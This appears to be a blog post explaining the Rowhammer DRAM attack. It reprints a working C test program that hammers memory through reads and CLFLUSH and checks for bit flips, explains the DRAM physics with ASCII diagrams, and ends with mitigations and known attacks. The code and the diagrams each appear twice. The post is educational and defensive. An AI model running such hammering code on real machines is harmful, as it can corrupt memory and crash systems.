tminusplus

Bring on the Rowhammer

As dynamic random-access memory (DRAM) modules have become smaller and more packed with memory, an attack vector appeared which bypasses the underlying assumption we carry in software development: that the only way to change a piece of memory is to directly write to it.

By quickly toggling pieces of memory in the right location, you can cause a piece of memory in another location to change value. This can allow you to attack other processes on the machine and gain privilege escalation with the kernel. It works because writing to memory causes electrical charge to dump into a cell, which causes a small amount of leakage to dump to other cells. The insulation found in between the cells is not enough to prevent this disturbance and even error-correcting code memory (ECC memory) can only guarantee that a bit or two won’t flip at a time.

Traditionally this attack was proposed by writing to memory, but today we’ll take a deep dive into how you can reproduce this by reading memory and why that works.

Readhammer

We’re going to take a peek at a practical DRAM Rowhammer exploit found by Mark Seaborn and Thomas Dullien. Take a quick read of the warning on the repository before running the Rowhammer tests. It may cause your computer to halt and catch fire if it manages to flip the right bit.

The rowhammer_test will allocate 1 GB of memory, pick eight random memory addresses, read those addresses and then flush the cache to DRAM. There is magic here because we aren’t actually attempting to flip bits by writing to them, like in a traditional Rowhammer attack, but instead we read them.

The core of the program is as follows with my added comments. The trick in this code is to clear the CPU cache of the values we are reading by using the x86 instruction CLFLUSHCLFLUSH in toggle(..)toggle(..). This ensures we read the memory from DRAM instead of the CPU cache.

const size_t mem_size = 1 << 30;
const int toggles = 540000;
 
void main_prog() {
  /* Allocate 1 GB (mem_size) of memory */
  g_mem = (char *) mmap(NULL, mem_size, PROT_READ | PROT_WRITE,
                        MAP_ANON | MAP_PRIVATE, -1, 0);
  assert(g_mem != MAP_FAILED);
 
  /* Set all bits to 1 in our alloc'd memory, which allows us to detect if a
     bit flipped by looking for a bit not set to 1.
 
     Perhaps this also allows for greater voltage fluctuation, since every bit
     must be refreshed. */
  printf("clear\n");
  memset(g_mem, 0xff, mem_size);
 
  Timer t;
  int iter = 0;
  for (;;) {
    printf("Iteration %i (after %.2fs)\n", iter++, t.get_diff());
 
    /* Function below, read 8 random addresses 540000 (toggles) times
       and repeat this 10 times */
    toggle(10, 8);
 
    Timer check_timer;
    uint64_t *end = (uint64_t *) (g_mem + mem_size);
    uint64_t *ptr;
    int errors = 0;
    for (ptr = (uint64_t *) g_mem; ptr < end; ptr++) {
      uint64_t got = *ptr;
      /* Check if there was a bit flip by looking for a bit
         not set to 1 in our alloc'd memory */
      if (got != ~(uint64_t) 0) {
        printf("error at %p: got 0x%" PRIx64 "\n", ptr, got);
        errors++;
      }
    }
    printf("  Checking for bit flips took %f sec\n", check_timer.get_diff());
    if (errors)
      exit(1);
  }
}
 
static void toggle(int iterations, int addr_count) {
  Timer timer;
  for (int j = 0; j < iterations; j++) {
    /* Pick the 8 random addresses */
    uint32_t *addrs[addr_count];
    for (int a = 0; a < addr_count; a++)
      addrs[a] = (uint32_t *) pick_addr();
 
    /* Read the 8 random addresses 540000 (toggles) times */
    uint32_t sum = 0;
    for (int i = 0; i < toggles; i++) {
      for (int a = 0; a < addr_count; a++)
        sum += *addrs[a] + 1;
      for (int a = 0; a < addr_count; a++)
        /* Flush the read memory from our cache using an x86 specific instruction */
        asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory");
    }
 
    // Sanity check. We don't expect this to fail, because reading
    // these rows refreshes them.
    if (sum != 0) {
      printf("error: sum=%x\n", sum);
      exit(1);
    }
  }
}
 
/* Pick a random memory address */
char *pick_addr() {
  size_t offset = (rand() << 12) % mem_size;
  return g_mem + offset;
}
const size_t mem_size = 1 << 30;
const int toggles = 540000;
 
void main_prog() {
  /* Allocate 1 GB (mem_size) of memory */
  g_mem = (char *) mmap(NULL, mem_size, PROT_READ | PROT_WRITE,
                        MAP_ANON | MAP_PRIVATE, -1, 0);
  assert(g_mem != MAP_FAILED);
 
  /* Set all bits to 1 in our alloc'd memory, which allows us to detect if a
     bit flipped by looking for a bit not set to 1.
 
     Perhaps this also allows for greater voltage fluctuation, since every bit
     must be refreshed. */
  printf("clear\n");
  memset(g_mem, 0xff, mem_size);
 
  Timer t;
  int iter = 0;
  for (;;) {
    printf("Iteration %i (after %.2fs)\n", iter++, t.get_diff());
 
    /* Function below, read 8 random addresses 540000 (toggles) times
       and repeat this 10 times */
    toggle(10, 8);
 
    Timer check_timer;
    uint64_t *end = (uint64_t *) (g_mem + mem_size);
    uint64_t *ptr;
    int errors = 0;
    for (ptr = (uint64_t *) g_mem; ptr < end; ptr++) {
      uint64_t got = *ptr;
      /* Check if there was a bit flip by looking for a bit
         not set to 1 in our alloc'd memory */
      if (got != ~(uint64_t) 0) {
        printf("error at %p: got 0x%" PRIx64 "\n", ptr, got);
        errors++;
      }
    }
    printf("  Checking for bit flips took %f sec\n", check_timer.get_diff());
    if (errors)
      exit(1);
  }
}
 
static void toggle(int iterations, int addr_count) {
  Timer timer;
  for (int j = 0; j < iterations; j++) {
    /* Pick the 8 random addresses */
    uint32_t *addrs[addr_count];
    for (int a = 0; a < addr_count; a++)
      addrs[a] = (uint32_t *) pick_addr();
 
    /* Read the 8 random addresses 540000 (toggles) times */
    uint32_t sum = 0;
    for (int i = 0; i < toggles; i++) {
      for (int a = 0; a < addr_count; a++)
        sum += *addrs[a] + 1;
      for (int a = 0; a < addr_count; a++)
        /* Flush the read memory from our cache using an x86 specific instruction */
        asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory");
    }
 
    // Sanity check. We don't expect this to fail, because reading
    // these rows refreshes them.
    if (sum != 0) {
      printf("error: sum=%x\n", sum);
      exit(1);
    }
  }
}
 
/* Pick a random memory address */
char *pick_addr() {
  size_t offset = (rand() << 12) % mem_size;
  return g_mem + offset;
}

Now that we’ve seen the proof-of-concept code, we can start to break down how reading from DRAM can cause a bit flip in an adjacent memory cell.

   On destructive read                        After destructive read                                                                  
   ──────────────●───────────── Word line     ──────────────●───────────── Word line                                                  
   │             │                            │             │                                                                         
1 ▼                            │           1
   │           ──┴── Transistor               │           ──┴── Transistor                                                            
   │           ─┬─┬─                          │           ─┬─┬─                                                                       
   │            │ │                           │            │ │                                                                        
   ●──────◀─────┘ └──◀───┐                    ●──────▶─────┘ └──▶───┐                                                                 
   │                   ──┴── Capacitor        │                   ──┴── Capacitor                                                     
   ▼   Charge dumped   ──┬──                  ▲    Capacitor      ──┬──                                                               
   │   onto bit line     ▽                    │    recharged        ▽                                                                 
   │                                          │                                                                                       
Bit line                                   Bit line                                                                                   
   On destructive read                        After destructive read                                                                  
   ──────────────●───────────── Word line     ──────────────●───────────── Word line                                                  
   │             │                            │             │                                                                         
1 ▼                            │           1
   │           ──┴── Transistor               │           ──┴── Transistor                                                            
   │           ─┬─┬─                          │           ─┬─┬─                                                                       
   │            │ │                           │            │ │                                                                        
   ●──────◀─────┘ └──◀───┐                    ●──────▶─────┘ └──▶───┐                                                                 
   │                   ──┴── Capacitor        │                   ──┴── Capacitor                                                     
   ▼   Charge dumped   ──┬──                  ▲    Capacitor      ──┬──                                                               
   │   onto bit line     ▽                    │    recharged        ▽                                                                 
   │                                          │                                                                                       
Bit line                                   Bit line                                                                                   

There are two separate buses, the bit line and the word line. The bit line is for sending the bit value and receiving a value to write. The use of the word line will become clear in the next picture. Note the word line and bit line cross each other but are not connected, as signified by a lack of a circle at their intersection.

There are two components here, the transistor and the capacitor. The transistor will connect the capacitor to the bit line when the word line has a value of 1. A value of 1 means a high voltage (1.8V) whereas a value of 0 means a low voltage (~0V). The capacitor stores the bit value and must discharge on a read to the bit line, making it a destructive read.

This means that we must refresh the capacitor after reads to ensure it holds the same value as before the read. On an unrelated note, capacitors will leak charge meaning we must periodically refresh every cell in the DRAM module to prevent it from losing its value.

We can zoom out of a single cell to the bigger picture of how a DRAM bank works below:

On destructive read                                                  After destructive read                                           
                                                                                                                                      
           Row                                                                  Row                                                   
           Decoder                                                              Decoder                                               
           ┌────┐                                                               ┌────┐                                                
           │    │ Word Lines ┌────────────┐                                     │    │ Word Lines ┌────────────┐                      
           │    ├────────────▶ ┌──────────┴─┐                                   │    ├────────────▶ ┌──────────┴─┐                    
Row  ──────▶    ├────────────▶ │            │                        Row  ──────▶    ├────────────▶ │            │                    
Addr ──────▶    ├────────────▶ │   Memory   │                        Addr ──────▶    ├────────────▶ │   Memory   │                    
           │    ├────────────▶ │   Array    │                                   │    ├────────────▶ │   Array    │                    
           │    │            └─┤            │                                   │    │            └─┤            │                    
           └────┘              └─┬──┬──┬──┬─┘                                   └────┘              └─▲──▲──▲──▲─┘                    
                                 │  │  │  │                                                           │  │  │  │                      
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
                            │ Sense Amplifier  │ Sense bit line                                  │ Sense Amplifier  │ Refresh DRAM    
                            │                  │ and buffer it                                   │                  │ cells           
                            └────┬──┬──┬──┬────┘                                                 └────┬──┬──┬──┬────┘                 
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
                            │    Row Buffer    │ Cache result of                                 │    Row Buffer    │                 
                            │                  │ entire row                                      │                  │                 
                            └────┬──┬──┬──┬────┘                                                 └────┬──┬──┬──┬────┘                 
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
           Column ──────────▶  Column Decoder  │ Select part of                 Column ──────────┤  Column Decoder  │                 
           Addr   ──────────▶                  │ buffered row                   Addr   ──────────┤                  │                 
                            └────────┬─────────┘                                                 └────────┬─────────┘                 
                                     │ Output                                                             │                           
                                       (1 bit in this example)                                                                        
On destructive read                                                  After destructive read                                           
                                                                                                                                      
           Row                                                                  Row                                                   
           Decoder                                                              Decoder                                               
           ┌────┐                                                               ┌────┐                                                
           │    │ Word Lines ┌────────────┐                                     │    │ Word Lines ┌────────────┐                      
           │    ├────────────▶ ┌──────────┴─┐                                   │    ├────────────▶ ┌──────────┴─┐                    
Row  ──────▶    ├────────────▶ │            │                        Row  ──────▶    ├────────────▶ │            │                    
Addr ──────▶    ├────────────▶ │   Memory   │                        Addr ──────▶    ├────────────▶ │   Memory   │                    
           │    ├────────────▶ │   Array    │                                   │    ├────────────▶ │   Array    │                    
           │    │            └─┤            │                                   │    │            └─┤            │                    
           └────┘              └─┬──┬──┬──┬─┘                                   └────┘              └─▲──▲──▲──▲─┘                    
                                 │  │  │  │                                                           │  │  │  │                      
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
                            │ Sense Amplifier  │ Sense bit line                                  │ Sense Amplifier  │ Refresh DRAM    
                            │                  │ and buffer it                                   │                  │ cells           
                            └────┬──┬──┬──┬────┘                                                 └────┬──┬──┬──┬────┘                 
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
                            │    Row Buffer    │ Cache result of                                 │    Row Buffer    │                 
                            │                  │ entire row                                      │                  │                 
                            └────┬──┬──┬──┬────┘                                                 └────┬──┬──┬──┬────┘                 
                            ┌────▼──▼──▼──▼────┐                                                 ┌────┴──┴──┴──┴────┐                 
           Column ──────────▶  Column Decoder  │ Select part of                 Column ──────────┤  Column Decoder  │                 
           Addr   ──────────▶                  │ buffered row                   Addr   ──────────┤                  │                 
                            └────────┬─────────┘                                                 └────────┬─────────┘                 
                                     │ Output                                                             │                           
                                       (1 bit in this example)                                                                        

The word lines connect to a row decoder which the CPU can use to select the row of DRAM it would like to read. This connects each cell in that row to the bit lines which cause the capacitors to discharge into the sense amplifier.

The sense amplifier will detect if the bit line is low or high and output that into the row buffer. It will also refresh the read value back into the capacitors by dumping charge back into them. This is why we can use reads for a Rowhammer attack.

The row buffer will cache the bits read in an entire row and enhance read speeds for a row because we don’t need to wait for the capacitors to discharge and then recharge. This is why we must pick memory locations in different rows, because if we didn’t then the refresh would never occur after the first read.

The final question is why does dumping charge into the DRAM cells sometimes cause other bits to flip. It is because DRAM modules are scaling to smaller physical dimensions to fit more memory onto a single chip. It becomes more difficult to prevent DRAM cells from electrically interacting with each other.

You can imagine a scenario where we could target a specific machine, understand how the physical addresses relate to the DRAM rows, allocate a physically-contiguous page of memory and then Rowhammer both sides of a targetted row to make this more effective. This is dubbed Double-Sided Rowhammering.

Summary

We’ve been so focused on building fast and small computers we’ve allowed holes to slip in the design of reliable hardware and ultimately software. One of the great challenges of this era is how to build reliable software and that starts with reliable hardware. While Rowhammer is only one attack against one component in a computer, it is a signal that we should consider the security of a hardware design when trading off performance and size.

Two steps to prevent Rowhammer attacks are:

  1. Ship ECC memory in consumer devices to protect against single/double bit-errors
  2. Refresh rows located around hot rows with high numbers of reads/writes

Hope you learned something!

Real-World Attacks

Here are some interesting Rowhammer attacks I found while researching for this blog:

  1. GLitch - Rowhammer the memory in a mobile GPU by using Javascript on a website
  2. Throwhammer - Rowhammer with network packets by using remote direct memory access (RDMA)
  3. DRAMMER - Rowhammer used to attack an Android device